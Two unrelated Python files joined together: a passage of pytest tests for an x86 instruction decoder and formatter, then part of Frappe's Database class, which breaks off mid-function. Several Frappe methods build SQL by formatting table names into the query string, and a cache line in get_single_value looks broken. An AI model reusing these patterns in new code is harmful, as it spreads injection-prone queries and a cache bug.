assert instr.condition_code == ConditionCode.NO
def test_short_near_br():
instr = Decoder(64, b"\x70\x00").decode()
assert instr.code == Code.JO_REL8_64
instr.as_short_branch()
assert instr.code == Code.JO_REL8_64
instr.as_near_branch()
assert instr.code == Code.JO_REL32_64
instr.as_near_branch()
assert instr.code == Code.JO_REL32_64
def test_op_code():
instr = Decoder(64, b"\x70\x00").decode()
idef1 = instr.op_code()
assert idef1.code == Code.JO_REL8_64
assert idef1 == OpCodeInfo(Code.JO_REL8_64)
def test_repr_str():
instr = Decoder(64, b"\x48\x05\xA5\x5A\x34\x82").decode()
assert repr(instr) == "add rax,0FFFFFFFF82345AA5h"
assert str(instr) == "add rax,0FFFFFFFF82345AA5h"
def test_format():
decoder = Decoder(64, b"\x48\x05\xA5\x5A\x34\x82" b"\x48\x8B\x05\x88\xA9\xCB\xED" b"\x70\x00")
decoder.ip = 0x1234_5678_9ABC_DEF0
instr = decoder.decode()
assert f"{instr}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:f}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:g}" == "add $0xFFFFFFFF82345AA5,%rax"
assert f"{instr:i}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:m}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:n}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:x}" == "add rax,0xffffffff82345aa5"
assert f"{instr:X}" == "add rax,0xFFFFFFFF82345AA5"
assert f"{instr:h}" == "add rax,0ffffffff82345aa5h"
assert f"{instr:H}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:Uh}" == "ADD RAX,0ffffffff82345aa5h"
assert f"{instr:s}" == "add rax, 0FFFFFFFF82345AA5h"
assert f"{instr:gG}" == "addq $0xFFFFFFFF82345AA5,%rax"
assert f"{instr:_}" == "add rax,0_FFFF_FFFF_8234_5AA5h"
assert f"{instr:ixUs_}" == "ADD RAX, 0xffff_ffff_8234_5aa5"
instr = decoder.decode()
assert f"{instr}" == "mov rax,[1234567888888885h]"
assert f"{instr:r}" == "mov rax,[rip-12345678h]"
assert f"{instr:S}" == "mov rax,ds:[1234567888888885h]"
assert f"{instr:M}" == "mov rax,qword ptr [1234567888888885h]"
instr = decoder.decode()
assert f"{instr}" == "jo short 123456789ABCDEFFh"
assert f"{instr:B}" == "jo 123456789ABCDEFFh"
def test_format_raise():
instr = Decoder(64, b"\x48\x05\xA5\x5A\x34\x82").decode()
with pytest.raises(ValueError):
f"{instr:!}"
def test_op_kind_raise():
instr = Instruction()
with pytest.raises(ValueError):
instr.op_kind(100)
with pytest.raises(ValueError):
instr.set_op_kind(100, OpKind.REGISTER)
with pytest.raises(ValueError):
instr.set_op_kind(0, 12345)
def test_op_register_raise():
instr = Instruction()
with pytest.raises(ValueError):
instr.op_register(100)
with pytest.raises(ValueError):
instr.set_op_register(100, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(0, 12345)
def test_immediate_raise():
instr = Instruction()
not_imm_op_kinds = [
OpKind.REGISTER,
OpKind.NEAR_BRANCH16,
OpKind.NEAR_BRANCH32,
OpKind.NEAR_BRANCH64,
OpKind.FAR_BRANCH16,
OpKind.FAR_BRANCH32,
OpKind.MEMORY_SEG_SI,
OpKind.MEMORY_SEG_ESI,
OpKind.MEMORY_SEG_RSI,
OpKind.MEMORY_SEG_DI,
OpKind.MEMORY_SEG_EDI,
OpKind.MEMORY_SEG_RDI,
OpKind.MEMORY_ESDI,
OpKind.MEMORY_ESEDI,
OpKind.MEMORY_ESRDI,
OpKind.MEMORY64,
OpKind.MEMORY,
]
imm_op_kinds = [
OpKind.IMMEDIATE8,
OpKind.IMMEDIATE8_2ND,
OpKind.IMMEDIATE16,
OpKind.IMMEDIATE32,
OpKind.IMMEDIATE64,
OpKind.IMMEDIATE8TO16,
OpKind.IMMEDIATE8TO32,
OpKind.IMMEDIATE8TO64,
OpKind.IMMEDIATE32TO64,
]
for kind in not_imm_op_kinds:
instr.op0_kind = kind
with pytest.raises(ValueError):
instr.immediate(0)
with pytest.raises(ValueError):
instr.set_immediate_i32(0, 0)
with pytest.raises(ValueError):
instr.set_immediate_u32(0, 0)
with pytest.raises(ValueError):
instr.set_immediate_i64(0, 0)
with pytest.raises(ValueError):
instr.set_immediate_u64(0, 0)
for kind in imm_op_kinds:
instr.op0_kind = kind
instr.immediate(0)
instr.set_immediate_i32(0, 0)
instr.set_immediate_u32(0, 0)
instr.set_immediate_i64(0, 0)
instr.set_immediate_u64(0, 0)
instr.op0_kind = OpKind.IMMEDIATE8
instr.immediate(0)
with pytest.raises(ValueError):
instr.immediate(100)
with pytest.raises(ValueError):
instr.set_immediate_i32(100, 0)
with pytest.raises(ValueError):
instr.set_immediate_u32(100, 0)
with pytest.raises(ValueError):
instr.set_immediate_i64(100, 0)
with pytest.raises(ValueError):
instr.set_immediate_u64(100, 0)
def test_db_raise():
instr = Instruction()
instr.code = Code.DECLAREBYTE
NUM = 16
instr.set_declare_byte_value_i8(NUM - 1, 0)
instr.set_declare_byte_value(NUM - 1, 0)
instr.get_declare_byte_value(NUM - 1)
instr.get_declare_byte_value_i8(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_byte_value_i8(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_byte_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_byte_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_byte_value_i8(NUM)
def test_dw_raise():
instr = Instruction()
instr.code = Code.DECLAREWORD
NUM = 8
instr.set_declare_word_value_i16(NUM - 1, 0)
instr.set_declare_word_value(NUM - 1, 0)
instr.get_declare_word_value(NUM - 1)
instr.get_declare_word_value_i16(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_word_value_i16(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_word_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_word_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_word_value_i16(NUM)
def test_dd_raise():
instr = Instruction()
instr.code = Code.DECLAREDWORD
NUM = 4
instr.set_declare_dword_value_i32(NUM - 1, 0)
instr.set_declare_dword_value(NUM - 1, 0)
instr.get_declare_dword_value(NUM - 1)
instr.get_declare_dword_value_i32(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_dword_value_i32(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_dword_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_dword_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_dword_value_i32(NUM)
def test_dq_raise():
instr = Instruction()
instr.code = Code.DECLAREQWORD
NUM = 2
instr.set_declare_qword_value_i64(NUM - 1, 0)
instr.set_declare_qword_value(NUM - 1, 0)
instr.get_declare_qword_value(NUM - 1)
instr.get_declare_qword_value_i64(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_qword_value_i64(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_qword_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_qword_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_qword_value_i64(NUM)
def test_code_size_raise():
instr = Instruction()
instr.code_size = CodeSize.CODE64
with pytest.raises(ValueError):
instr.code_size = 1234
def test_code_raise():
instr = Instruction()
instr.code = Code.EVEX_VAESENCLAST_ZMM_ZMM_ZMMM512
with pytest.raises(ValueError):
instr.code = 10000
def test_segment_prefix_raise():
instr = Instruction()
instr.segment_prefix = Register.FS
with pytest.raises(ValueError):
instr.segment_prefix = 1234
def test_memory_base_raise():
instr = Instruction()
instr.memory_base = Register.RAX
with pytest.raises(ValueError):
instr.memory_base = 1234
def test_memory_index_raise():
instr = Instruction()
instr.memory_index = Register.RAX
with pytest.raises(ValueError):
instr.memory_index = 1234
def test_op_register_raise():
instr = Instruction()
instr.op0_register = Register.RAX
with pytest.raises(ValueError):
instr.op0_register = 1234
instr.set_op_register(0, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(0, 1234)
instr.op1_register = Register.RAX
with pytest.raises(ValueError):
instr.op1_register = 1234
instr.set_op_register(1, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(1, 1234)
instr.op2_register = Register.RAX
with pytest.raises(ValueError):
instr.op2_register = 1234
instr.set_op_register(2, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(2, 1234)
instr.op3_register = Register.RAX
with pytest.raises(ValueError):
instr.op3_register = 1234
instr.set_op_register(3, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(3, 1234)
instr.op4_register = Register.NONE
with pytest.raises(ValueError):
instr.op4_register = 1234
instr.set_op_register(4, Register.NONE)
with pytest.raises(ValueError):
instr.set_op_register(4, 1234)
def test_op_mask_raise():
instr = Instruction()
instr.op_mask = Register.K1
with pytest.raises(ValueError):
instr.op_mask = 1234
def test_fpu_stack_increment_info():
instr = Decoder(64, b"\xDA\x18").decode()
info = instr.fpu_stack_increment_info()
assert info.increment == 1
assert not info.conditional
assert info.writes_top
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Database Module
# --------------------
from __future__ import unicode_literals
import re
import time
import frappe
import datetime
import frappe.defaults
import frappe.model.meta
from frappe import _
from time import time
from frappe.utils import now, getdate, cast_fieldtype, get_datetime
from frappe.utils.background_jobs import execute_job, get_queue
from frappe.model.utils.link_count import flush_local_link_count
from frappe.utils import cint
# imports - compatibility imports
from six import (
integer_types,
string_types,
text_type,
iteritems
)
class Database(object):
"""
Open a database connection with the given parmeters, if use_default is True, use the
login details from `conf.py`. This is called by the request handler and is accessible using
the `db` global variable. the `sql` method is also global to run queries
"""
VARCHAR_LEN = 140
MAX_COLUMN_LENGTH = 64
OPTIONAL_COLUMNS = ["_user_tags", "_comments", "_assign", "_liked_by"]
DEFAULT_SHORTCUTS = ['_Login', '__user', '_Full Name', 'Today', '__today', "now", "Now"]
STANDARD_VARCHAR_COLUMNS = ('name', 'owner', 'modified_by', 'parent', 'parentfield', 'parenttype')
DEFAULT_COLUMNS = ['name', 'creation', 'modified', 'modified_by', 'owner', 'docstatus', 'parent',
'parentfield', 'parenttype', 'idx']
class InvalidColumnName(frappe.ValidationError): pass
def __init__(self, host=None, user=None, password=None, ac_name=None, use_default=0, port=None):
self.setup_type_map()
self.host = host or frappe.conf.db_host or '127.0.0.1'
self.port = port or frappe.conf.db_port or ''
self.user = user or frappe.conf.db_name
self.db_name = frappe.conf.db_name
self._conn = None
if ac_name:
self.user = ac_name or frappe.conf.db_name
if use_default:
self.user = frappe.conf.db_name
self.transaction_writes = 0
self.auto_commit_on_many_writes = 0
self.password = password or frappe.conf.db_password
self.value_cache = {}
def setup_type_map(self):
pass
def connect(self):
"""Connects to a database as set in `site_config.json`."""
self.cur_db_name = self.user
self._conn = self.get_connection()
self._cursor = self._conn.cursor()
frappe.local.rollback_observers = []
def use(self, db_name):
"""`USE` db_name."""
self._conn.select_db(db_name)
def get_connection(self):
pass
def get_database_size(self):
pass
def sql(self, query, values=(), as_dict = 0, as_list = 0, formatted = 0,
debug=0, ignore_ddl=0, as_utf8=0, auto_commit=0, update=None, explain=False):
"""Execute a SQL query and fetch all rows.
:param query: SQL query.
:param values: List / dict of values to be escaped and substituted in the query.
:param as_dict: Return as a dictionary.
:param as_list: Always return as a list.
:param formatted: Format values like date etc.
:param debug: Print query and `EXPLAIN` in debug log.
:param ignore_ddl: Catch exception if table, column missing.
:param as_utf8: Encode values as UTF 8.
:param auto_commit: Commit after executing the query.
:param update: Update this dict to all rows (if returned `as_dict`).
Examples:
# return customer names as dicts
frappe.db.sql("select name from tabCustomer", as_dict=True)
# return names beginning with a
frappe.db.sql("select name from tabCustomer where name like %s", "a%")
# values as dict
frappe.db.sql("select name from tabCustomer where name like %(name)s and owner=%(owner)s",
{"name": "a%", "owner":"test@example.com"})
"""
if re.search(r'ifnull\(', query, flags=re.IGNORECASE):
# replaces ifnull in query with coalesce
query = re.sub(r'ifnull\(', 'coalesce(', query, flags=re.IGNORECASE)
if not self._conn:
self.connect()
# in transaction validations
self.check_transaction_status(query)
self.clear_db_table_cache(query)
# autocommit
if auto_commit: self.commit()
# execute
try:
if debug:
time_start = time()
self.log_query(query, values, debug, explain)
if values!=():
if isinstance(values, dict):
values = dict(values)
# MySQL-python==1.2.5 hack!
if not isinstance(values, (dict, tuple, list)):
values = (values,)
self._cursor.execute(query, values)
if frappe.flags.in_migrate:
self.log_touched_tables(query, values)
else:
self._cursor.execute(query)
if frappe.flags.in_migrate:
self.log_touched_tables(query)
if debug:
time_end = time()
frappe.errprint(("Execution time: {0} sec").format(round(time_end - time_start, 2)))
except Exception as e:
if frappe.conf.db_type == 'postgres':
self.rollback()
elif self.is_syntax_error(e):
# only for mariadb
frappe.errprint('Syntax error in query:')
frappe.errprint(query)
if ignore_ddl and (self.is_missing_column(e) or self.is_missing_table(e) or self.cant_drop_field_or_key(e)):
pass
else:
raise
if auto_commit: self.commit()
if not self._cursor.description:
return ()
# scrub output if required
if as_dict:
ret = self.fetch_as_dict(formatted, as_utf8)
if update:
for r in ret:
r.update(update)
return ret
elif as_list:
return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
elif as_utf8:
return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
else:
return self._cursor.fetchall()
def log_query(self, query, values, debug, explain):
# for debugging in tests
if frappe.conf.get('allow_tests') and frappe.cache().get_value('flag_print_sql'):
print(self.mogrify(query, values))
# debug
if debug:
if explain and query.strip().lower().startswith('select'):
self.explain_query(query, values)
frappe.errprint(self.mogrify(query, values))
# info
if (frappe.conf.get("logging") or False)==2:
frappe.log("<<<< query")
frappe.log(self.mogrify(query, values))
frappe.log(">>>>")
def mogrify(self, query, values):
'''build the query string with values'''
if not values:
return query
else:
try:
return self._cursor.mogrify(query, values)
except: # noqa: E722
return (query, values)
def explain_query(self, query, values=None):
"""Print `EXPLAIN` in error log."""
try:
frappe.errprint("--- query explain ---")
if values is None:
self._cursor.execute("explain " + query)
else:
self._cursor.execute("explain " + query, values)
import json
frappe.errprint(json.dumps(self.fetch_as_dict(), indent=1))
frappe.errprint("--- query explain end ---")
except Exception:
frappe.errprint("error in query explain")
def sql_list(self, query, values=(), debug=False):
"""Return data as list of single elements (first column).
Example:
# doctypes = ["DocType", "DocField", "User", ...]
doctypes = frappe.db.sql_list("select name from DocType")
"""
return [r[0] for r in self.sql(query, values, debug=debug)]
def sql_ddl(self, query, values=(), debug=False):
"""Commit and execute a query. DDL (Data Definition Language) queries that alter schema
autocommit in MariaDB."""
self.commit()
self.sql(query, debug=debug)
def check_transaction_status(self, query):
"""Raises exception if more than 20,000 `INSERT`, `UPDATE` queries are
executed in one transaction. This is to ensure that writes are always flushed otherwise this
could cause the system to hang."""
if self.transaction_writes and \
query and query.strip().split()[0].lower() in ['start', 'alter', 'drop', 'create', "begin", "truncate"]:
raise Exception('This statement can cause implicit commit')
if query and query.strip().lower() in ('commit', 'rollback'):
self.transaction_writes = 0
if query[:6].lower() in ('update', 'insert', 'delete'):
self.transaction_writes += 1
if self.transaction_writes > 200000:
if self.auto_commit_on_many_writes:
self.commit()
else:
frappe.throw(_("Too many writes in one request. Please send smaller requests"), frappe.ValidationError)
def fetch_as_dict(self, formatted=0, as_utf8=0):
"""Internal. Converts results to dict."""
result = self._cursor.fetchall()
ret = []
if result:
keys = [column[0] for column in self._cursor.description]
for r in result:
values = []
for value in r:
if as_utf8 and isinstance(value, text_type):
value = value.encode('utf-8')
values.append(value)
ret.append(frappe._dict(zip(keys, values)))
return ret
@staticmethod
def clear_db_table_cache(query):
if query and query.strip().split()[0].lower() in {'drop', 'create'}:
frappe.cache().delete_key('db_tables')
@staticmethod
def needs_formatting(result, formatted):
"""Returns true if the first row in the result has a Date, Datetime, Long Int."""
if result and result[0]:
for v in result[0]:
if isinstance(v, (datetime.date, datetime.timedelta, datetime.datetime, integer_types)):
return True
if formatted and isinstance(v, (int, float)):
return True
return False
def get_description(self):
"""Returns result metadata."""
return self._cursor.description
@staticmethod
def convert_to_lists(res, formatted=0, as_utf8=0):
"""Convert tuple output to lists (internal)."""
nres = []
for r in res:
nr = []
for val in r:
if as_utf8 and isinstance(val, text_type):
val = val.encode('utf-8')
nr.append(val)
nres.append(nr)
return nres
@staticmethod
def build_conditions(filters):
"""Convert filters sent as dict, lists to SQL conditions. filter's key
is passed by map function, build conditions like:
* ifnull(`fieldname`, default_value) = %(fieldname)s
* `fieldname` [=, !=, >, >=, <, <=] %(fieldname)s
"""
conditions = []
values = {}
def _build_condition(key):
"""
filter's key is passed by map function
build conditions like:
* ifnull(`fieldname`, default_value) = %(fieldname)s
* `fieldname` [=, !=, >, >=, <, <=] %(fieldname)s
"""
_operator = "="
_rhs = " %(" + key + ")s"
value = filters.get(key)
values[key] = value
if isinstance(value, (list, tuple)):
# value is a tuble like ("!=", 0)
_operator = value[0]
values[key] = value[1]
if isinstance(value[1], (tuple, list)):
# value is a list in tuple ("in", ("A", "B"))
inner_list = []
for i, v in enumerate(value[1]):
inner_key = "{0}_{1}".format(key, i)
values[inner_key] = v
inner_list.append("%({0})s".format(inner_key))
_rhs = " ({0})".format(", ".join(inner_list))
del values[key]
if _operator not in ["=", "!=", ">", ">=", "<", "<=", "like", "in", "not in", "not like"]:
_operator = "="
if "[" in key:
split_key = key.split("[")
condition = "coalesce(`" + split_key[0] + "`, " + split_key[1][:-1] + ") " \
+ _operator + _rhs
else:
condition = "`" + key + "` " + _operator + _rhs
conditions.append(condition)
if isinstance(filters, int):
# docname is a number, convert to string
filters = str(filters)
if isinstance(filters, string_types):
filters = { "name": filters }
for f in filters:
_build_condition(f)
return " and ".join(conditions), values
def get(self, doctype, filters=None, as_dict=True, cache=False):
"""Returns `get_value` with fieldname='*'"""
return self.get_value(doctype, filters, "*", as_dict=as_dict, cache=cache)
def get_value(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False,
debug=False, order_by=None, cache=False, for_update=False):
"""Returns a document property or list of properties.
:param doctype: DocType name.
:param filters: Filters like `{"x":"y"}` or name of the document. `None` if Single DocType.
:param fieldname: Column name.
:param ignore: Don't raise exception if table, column is missing.
:param as_dict: Return values as dict.
:param debug: Print query in error log.
:param order_by: Column to order by
Example:
# return first customer starting with a
frappe.db.get_value("Customer", {"name": ("like a%")})
# return last login of **User** `test@example.com`
frappe.db.get_value("User", "test@example.com", "last_login")
last_login, last_ip = frappe.db.get_value("User", "test@example.com",
["last_login", "last_ip"])
# returns default date_format
frappe.db.get_value("System Settings", None, "date_format")
"""
ret = self.get_values(doctype, filters, fieldname, ignore, as_dict, debug,
order_by, cache=cache, for_update=for_update)
return ((len(ret[0]) > 1 or as_dict) and ret[0] or ret[0][0]) if ret else None
def get_values(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False,
debug=False, order_by=None, update=None, cache=False, for_update=False):
"""Returns multiple document properties.
:param doctype: DocType name.
:param filters: Filters like `{"x":"y"}` or name of the document.
:param fieldname: Column name.
:param ignore: Don't raise exception if table, column is missing.
:param as_dict: Return values as dict.
:param debug: Print query in error log.
:param order_by: Column to order by
Example:
# return first customer starting with a
customers = frappe.db.get_values("Customer", {"name": ("like a%")})
# return last login of **User** `test@example.com`
user = frappe.db.get_values("User", "test@example.com", "*")[0]
"""
out = None
if cache and isinstance(filters, string_types) and \
(doctype, filters, fieldname) in self.value_cache:
return self.value_cache[(doctype, filters, fieldname)]
if not order_by: order_by = 'modified desc'
if isinstance(filters, list):
out = self._get_value_for_many_names(doctype, filters, fieldname, debug=debug)
else:
fields = fieldname
if fieldname!="*":
if isinstance(fieldname, string_types):
fields = [fieldname]
else:
fields = fieldname
if (filters is not None) and (filters!=doctype or doctype=="DocType"):
try:
out = self._get_values_from_table(fields, filters, doctype, as_dict, debug, order_by, update, for_update=for_update)
except Exception as e:
if ignore and (frappe.db.is_missing_column(e) or frappe.db.is_table_missing(e)):
# table or column not found, return None
out = None
elif (not ignore) and frappe.db.is_table_missing(e):
# table not found, look in singles
out = self.get_values_from_single(fields, filters, doctype, as_dict, debug, update)
else:
raise
else:
out = self.get_values_from_single(fields, filters, doctype, as_dict, debug, update)
if cache and isinstance(filters, string_types):
self.value_cache[(doctype, filters, fieldname)] = out
return out
def get_values_from_single(self, fields, filters, doctype, as_dict=False, debug=False, update=None):
"""Get values from `tabSingles` (Single DocTypes) (internal).
:param fields: List of fields,
:param filters: Filters (dict).
:param doctype: DocType name.
"""
# TODO
# if not frappe.model.meta.is_single(doctype):
# raise frappe.DoesNotExistError("DocType", doctype)
if fields=="*" or isinstance(filters, dict):
# check if single doc matches with filters
values = self.get_singles_dict(doctype)
if isinstance(filters, dict):
for key, value in filters.items():
if values.get(key) != value:
return []
if as_dict:
return values and [values] or []
if isinstance(fields, list):
return [map(values.get, fields)]
else:
r = self.sql("""select field, value
from `tabSingles` where field in (%s) and doctype=%s"""
% (', '.join(['%s'] * len(fields)), '%s'),
tuple(fields) + (doctype,), as_dict=False, debug=debug)
if as_dict:
if r:
r = frappe._dict(r)
if update:
r.update(update)
return [r]
else:
return []
else:
return r and [[i[1] for i in r]] or []
def get_singles_dict(self, doctype, debug = False):
"""Get Single DocType as dict.
:param doctype: DocType of the single object whose value is requested
Example:
# Get coulmn and value of the single doctype Accounts Settings
account_settings = frappe.db.get_singles_dict("Accounts Settings")
"""
result = self.sql("""
SELECT field, value
FROM `tabSingles`
WHERE doctype = %s
""", doctype)
# result = _cast_result(doctype, result)
dict_ = frappe._dict(result)
return dict_
@staticmethod
def get_all(*args, **kwargs):
return frappe.get_all(*args, **kwargs)
@staticmethod
def get_list(*args, **kwargs):
return frappe.get_list(*args, **kwargs)
def get_single_value(self, doctype, fieldname, cache=False):
"""Get property of Single DocType. Cache locally by default
:param doctype: DocType of the single object whose value is requested
:param fieldname: `fieldname` of the property whose value is requested
Example:
# Get the default value of the company from the Global Defaults doctype.
company = frappe.db.get_single_value('Global Defaults', 'default_company')
"""
if not doctype in self.value_cache:
self.value_cache = self.value_cache[doctype] = {}
if fieldname in self.value_cache[doctype]:
return self.value_cache[doctype][fieldname]
val = self.sql("""select `value` from
`tabSingles` where `doctype`=%s and `field`=%s""", (doctype, fieldname))
val = val[0][0] if val else None
df = frappe.get_meta(doctype).get_field(fieldname)
if not df:
frappe.throw(_('Invalid field name: {0}').format(frappe.bold(fieldname)), self.InvalidColumnName)
if df.fieldtype in frappe.model.numeric_fieldtypes:
val = cint(val)
self.value_cache[doctype][fieldname] = val
return val
def get_singles_value(self, *args, **kwargs):
"""Alias for get_single_value"""
return self.get_single_value(*args, **kwargs)
def _get_values_from_table(self, fields, filters, doctype, as_dict, debug, order_by=None, update=None, for_update=False):
fl = []
if isinstance(fields, (list, tuple)):
for f in fields:
if "(" in f or " as " in f: # function
fl.append(f)
else:
fl.append("`" + f + "`")
fl = ", ".join(fl)
else:
fl = fields
if fields=="*":
as_dict = True
conditions, values = self.build_conditions(filters)
order_by = ("order by " + order_by) if order_by else ""
r = self.sql("select {fields} from `tab{doctype}` {where} {conditions} {order_by} {for_update}"
.format(
for_update = 'for update' if for_update else '',
fields = fl,
doctype = doctype,
where = "where" if conditions else "",
conditions = conditions,
order_by = order_by),
values, as_dict=as_dict, debug=debug, update=update)
return r
def _get_value_for_many_names(self, doctype, names, field, debug=False):
names = list(filter(None, names))
if names:
return self.get_all(doctype,
fields=['name', field],
filters=[['name', 'in', names]],
debug=debug, as_list=1)
else:
return {}
def update(self, *args, **kwargs):
"""Update multiple values. Alias for `set_value`."""
return self.set_value(*args, **kwargs)
def set_value(self, dt, dn, field, val=None, modified=None, modified_by=None,
update_modified=True, debug=False, for_update=True):
"""Set a single value in the database, do not call the ORM triggers
but update the modified timestamp (unless specified not to).
**Warning:** this function will not call Document events and should be avoided in normal cases.
:param dt: DocType name.
:param dn: Document name.
:param field: Property / field name or dictionary of values to be updated
:param value: Value to be updated.
:param modified: Use this as the `modified` timestamp.
:param modified_by: Set this user as `modified_by`.
:param update_modified: default True. Set as false, if you don't want to update the timestamp.
:param debug: Print the query in the developer / js console.
:param for_update: Will add a row-level lock to the value that is being set so that it can be released on commit.
"""
if not modified:
modified = now()
if not modified_by:
modified_by = frappe.session.user
to_update = {}
if update_modified:
to_update = {"modified": modified, "modified_by": modified_by}
if isinstance(field, dict):
to_update.update(field)
else:
to_update.update({field: val})
if dn and dt!=dn:
# with table
set_values = []
for key in to_update:
set_values.append('`{0}`=%({0})s'.format(key))
for name in self.get_values(dt, dn, 'name', for_update=for_update):
values = dict(name=name[0])
values.update(to_update)
self.sql("""update `tab{0}`
set {1} where name=%(name)s""".format(dt, ', '.join(set_values)),
values, debug=debug)
else:
# for singles
keys = list(to_update)
self.sql('''
delete from `tabSingles`
where field in ({0}) and
doctype=%s'''.format(', '.join(['%s']*len(keys))),
list(keys) + [dt], debug=debug)
for key, value in iteritems(to_update):
self.sql('''insert into `tabSingles` (doctype, field, value) values (%s, %s, %s)''',
(dt, key, value), debug=debug)
if dt in self.value_cache:
del self.value_cache[dt]
frappe.clear_document_cache(dt, dn)
@staticmethod
def set(doc, field, val):
"""Set value in document. **Avoid**"""
doc.db_set(field, val)
def touch(self, doctype, docname):
"""Update the modified timestamp of this document."""
modified = now()
self.sql("""update `tab{doctype}` set `modified`=%s
where name=%s""".format(doctype=doctype), (modified, docname))
return modified
@staticmethod
def set_temp(value):
"""Set a temperory value and return a key."""
key = frappe.generate_hash()
frappe.cache().hset("temp", key, value)
return key
@staticmethod
def get_temp(key):
"""Return the temperory value and delete it."""
return frappe.cache().hget("temp", key)
def set_global(self, key, val, user='__global'):
"""Save a global key value. Global values will be automatically set if they match fieldname."""
self.set_default(key, val, user)
def get_global(self, key, user='__global'):
"""Returns a global key value."""
return self.get_default(key, user)
def get_default(self, key, parent="__default"):
"""Returns default value as a list if multiple or single"""
d = self.get_defaults(key, parent)
return isinstance(d, list) and d[0] or d
@staticmethod
def set_default(key, val, parent="__default", parenttype=None):
"""Sets a global / user default value."""
frappe.defaults.set_default(key, val, parent, parenttype)
@staticmethod
def add_default(key, val, parent="__default", parenttype=None):
"""Append a default value for a key, there can be multiple default values for a particular key."""
frappe.defaults.add_default(key, val, parent, parenttype)
@staticmethod
def get_defaults(key=None, parent="__default"):
"""Get all defaults"""
if key:
defaults = frappe.defaults.get_defaults(parent)
d = defaults.get(key, None)
if(not d and key != frappe.scrub(key)):
d = defaults.get(frappe.scrub(key), None)
return d
else:
return frappe.defaults.get_defaults(parent)
def begin(self):
self.sql("START TRANSACTION")
def commit(self):
"""Commit current transaction. Calls SQL `COMMIT`."""
self.sql("commit")
frappe.local.rollback_observers = []
self.flush_realtime_log()
enqueue_jobs_after_commit()
flush_local_link_count()
@staticmethod
def flush_realtime_log():
for args in frappe.local.realtime_log:
frappe.realtime.emit_via_redis(*args)
frappe.local.realtime_log = []
def rollback(self):
"""`ROLLBACK` current transaction."""
self.sql("rollback")
self.begin()
for obj in frappe.local.rollback_observers:
if hasattr(obj, "on_rollback"):
obj.on_rollback()
frappe.local.rollback_observers = []
def field_exists(self, dt, fn):
"""Return true of field exists."""
return self.exists('DocField', {
'fieldname': fn,
'parent': dt
})
def table_exists(self, doctype):
"""Returns True if table for given doctype exists."""
return ("tab" + doctype) in self.get_tables()
def get_tables(self):
tables = frappe.cache().get_value('db_tables')
if not tables:
table_rows = self.sql("""
SELECT table_name
FROM information_schema.tables
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
""")
tables = {d[0] for d in table_rows}
frappe.cache().set_value('db_tables', tables)
return tables
def a_row_exists(self, doctype):
"""Returns True if atleast one row exists."""
return self.sql("select name from `tab{doctype}` limit 1".format(doctype=doctype))
def exists(self, dt, dn=None, cache=False):
"""Returns true if document exists.
:param dt: DocType name.
:param dn: Document name or filter dict."""
if isinstance(dt, string_types):
if dt!="DocType" and dt==dn:
return True # single always exists (!)
try:
return self.get_value(dt, dn, "name", cache=cache)
except Exception:
return None
elif isinstance(dt, dict) and dt.get('doctype'):
try:
conditions = []
for d in dt:
if d == 'doctype': continue
conditions.append([d, '=', dt[d]])
return self.get_all(dt['doctype'], filters=conditions, as_list=1)
except Exception:
return None
def count(self, dt, filters=None, debug=False, cache=False):
"""Returns `COUNT(*)` for given DocType and filters."""
if cache and not filters:
cache_count = frappe.cache().get_value('doctype:count:{}'.format(dt))
if cache_count is not None:
return cache_count
if filters:
conditions, filters = self.build_conditions(filters)
count = self.sql("""select count(*)
from `tab%s` where %s""" % (dt, conditions), filters, debug=debug)[0][0]
return count
else:
count = self.sql("""select count(*)
from `tab%s`""" % (dt,))[0][0]
if cache:
frappe.cache().set_value('doctype:count:{}'.format(dt), count, expires_in_sec = 86400)
return count
@staticmethod
def format_date(date):
return getdate(date).strftime("%Y-%m-%d")
@staticmethod
def format_datetime(datetime):
if not datetime:
return '0001-01-01 00:00:00.000000'
if isinstance(datetime, frappe.string_types):
if ':' not in datetime:
datetime = datetime + ' 00:00:00.000000'
else:
datetime = datetime.strftime("%Y-%m-%d %H:%M:%S.%f")
return datetime
def get_creation_count(self, doctype, minutes):
"""Get count of records created in the last x minutes"""
from frappe.utils import now_datetime
from dateutil.relativedelta import relativedelta
return self.sql("""select count(name) from `tab{doctype}`
where creation >= %s""".format(doctype=doctype),
now_datetime() - relativedelta(minutes=minutes))[0][0]
def get_db_table_columns(self, table):
"""Returns list of column names from given table."""
columns = frappe.cache().hget('table_columns', table)
if columns is None:
columns = [r[0] for r in self.sql('''
select column_name
from information_schema.columns
where table_name = %s ''', table)]
if columns:
frappe.cache().hset('table_columns', table, columns)
return columns
def get_table_columns(self, doctype):
"""Returns list of column names from given doctype."""
columns = self.get_db_table_columns('tab' + doctype)
if not columns:
